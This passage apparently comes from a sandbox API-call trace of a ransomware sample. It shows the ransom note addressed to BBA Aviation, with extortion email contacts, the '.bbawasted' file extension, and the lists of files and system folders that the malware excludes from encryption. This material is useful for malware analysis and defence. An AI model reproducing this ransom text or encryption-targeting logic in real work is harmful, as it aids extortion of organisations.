NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 280 [0155.948] StrChrW (lpStart="[begin_key]*[end_key]", wMatch=0x2a) returned="*[end_key]" [0155.948] StrStrW (lpFirst="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n", lpSrch="[begin_key]*[end_key]") returned="[begin_key]*[end_key]\r\nKEEP IT\r\n" [0155.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x236) returned 0x68a028 [0155.948] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689de8 | out: hHeap=0x660000) returned 1 [0155.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x6822b0 [0155.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x6822c0 [0155.949] StrToIntExW (in: pszString="300", dwFlags=0x0, piRet=0x12fff5c | out: piRet=0x12fff5c) returned 1 [0155.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6822c0 | out: hHeap=0x660000) returned 1 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683ad8 [0155.949] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x18 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x66d640 [0155.949] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x66d640, nSize=0x18 | out: lpDst="C:\\WINDOWS\\TEMP\\lck.log") returned 0x18 [0155.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683ad8 | out: hHeap=0x660000) returned 1 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x290) returned 0x68a268 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb8) returned 0x66d3a8 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x150) returned 0x689de8 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xe) returned 0x685ad8 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x6) returned 0x6822c0 [0155.949] StrToIntExW (in: pszString="50", dwFlags=0x0, piRet=0x12ffeb8 | out: piRet=0x12ffeb8) returned 1 [0155.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6822c0 | out: hHeap=0x660000) returned 1 [0155.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x6) returned 0x6822c0 [0155.949] StrToIntExW (in: pszString="32", dwFlags=0x0, piRet=0x12fff30 | out: piRet=0x12fff30) returned 1 [0155.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6822c0 | out: hHeap=0x660000) returned 1 [0155.949] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x12ffe84 | out: ppstm=0x12ffe84*=0x683c40) returned 0x0 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] lstrlenW (lpString=".bbawasted_info") returned 15 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x683e48*=0x2e, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] lstrlenW (lpString=".bbawasted") returned 10 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x683998*=0x2e, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] lstrlenW (lpString="*\\NTLDR|*\\BOOTMGR|*\\GRLDR|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe") returned 327 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x68a268*=0x2a, cb=0x28e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] StrChrW (lpStart="%ProgramData%|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0155.953] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xf [0155.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683d80 [0155.953] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x683d80, nSize=0xf | out: lpDst="C:\\ProgramData") returned 0xf [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x683d80*=0x43, cb=0x1c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683d80 | out: hHeap=0x660000) returned 1 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.953] StrChrW (lpStart="%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0155.953] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xb [0155.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6838f8 [0155.954] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x6838f8, nSize=0xb | out: lpDst="C:\\WINDOWS") returned 0xb [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x6838f8*=0x43, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6838f8 | out: hHeap=0x660000) returned 1 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] StrChrW (lpStart="%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0155.954] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x10 [0155.954] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683ad8 [0155.954] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x683ad8, nSize=0x10 | out: lpDst="C:\\WINDOWS\\TEMP") returned 0x10 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x683ad8*=0x43, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683ad8 | out: hHeap=0x660000) returned 1 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] StrChrW (lpStart="%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0155.954] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x39 [0155.954] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x72) returned 0x66f548 [0155.954] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x66f548, nSize=0x39 | out: lpDst="C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x39 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x66f548*=0x43, cb=0x70, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66f548 | out: hHeap=0x660000) returned 1 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.954] StrChrW (lpStart="C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files|C:\\Program Files (x86)" [0155.954] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xc [0155.955] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6837f8 [0155.955] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x6837f8, nSize=0xc | out: lpDst="C:\\Recovery") returned 0xc [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x6837f8*=0x43, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.955] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6837f8 | out: hHeap=0x660000) returned 1 [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.955] StrChrW (lpStart="C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files (x86)" [0155.955] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0155.955] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x684268 [0155.955] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x684268, nSize=0x11 | out: lpDst="C:\\Program Files") returned 0x11 [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x684268*=0x43, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.955] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x684268 | out: hHeap=0x660000) returned 1 [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.955] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] StrChrW (lpStart="C:\\Program Files (x86)", wMatch=0x7c) returned 0x0 [0155.956] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x17 [0155.956] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2e) returned 0x68ab90 [0155.956] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x68ab90, nSize=0x17 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x68ab90*=0x43, cb=0x2c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x68ab90 | out: hHeap=0x660000) returned 1 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] StrChrW (lpStart="bin|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.956] lstrlenW (lpString="bin") returned 3 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689de8*=0x62, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.956] StrChrW (lpStart="Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.957] lstrlenW (lpString="Boot") returned 4 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689df0*=0x42, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] StrChrW (lpStart="boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.957] lstrlenW (lpString="boot") returned 4 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689dfa*=0x62, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] StrChrW (lpStart="dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.957] lstrlenW (lpString="dev") returned 3 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e04*=0x64, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] StrChrW (lpStart="etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.957] lstrlenW (lpString="etc") returned 3 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.957] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e0c*=0x65, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] StrChrW (lpStart="lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.958] lstrlenW (lpString="lib") returned 3 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e14*=0x6c, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] StrChrW (lpStart="initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.958] lstrlenW (lpString="initdr") returned 6 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e1c*=0x69, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] StrChrW (lpStart="sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.958] lstrlenW (lpString="sbin") returned 4 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e2a*=0x73, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.958] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] StrChrW (lpStart="sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.959] lstrlenW (lpString="sys") returned 3 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x689e34*=0x73, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0155.959] StrChrW (lpStart="vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0155.959] lstrlenW (lpString="vmlinuz") returned 7 [0155.959] ISequentialStream:RemoteWrite (in: This=0x683c40, pv=0x12ffe20*=0x2a, cb=0x2, 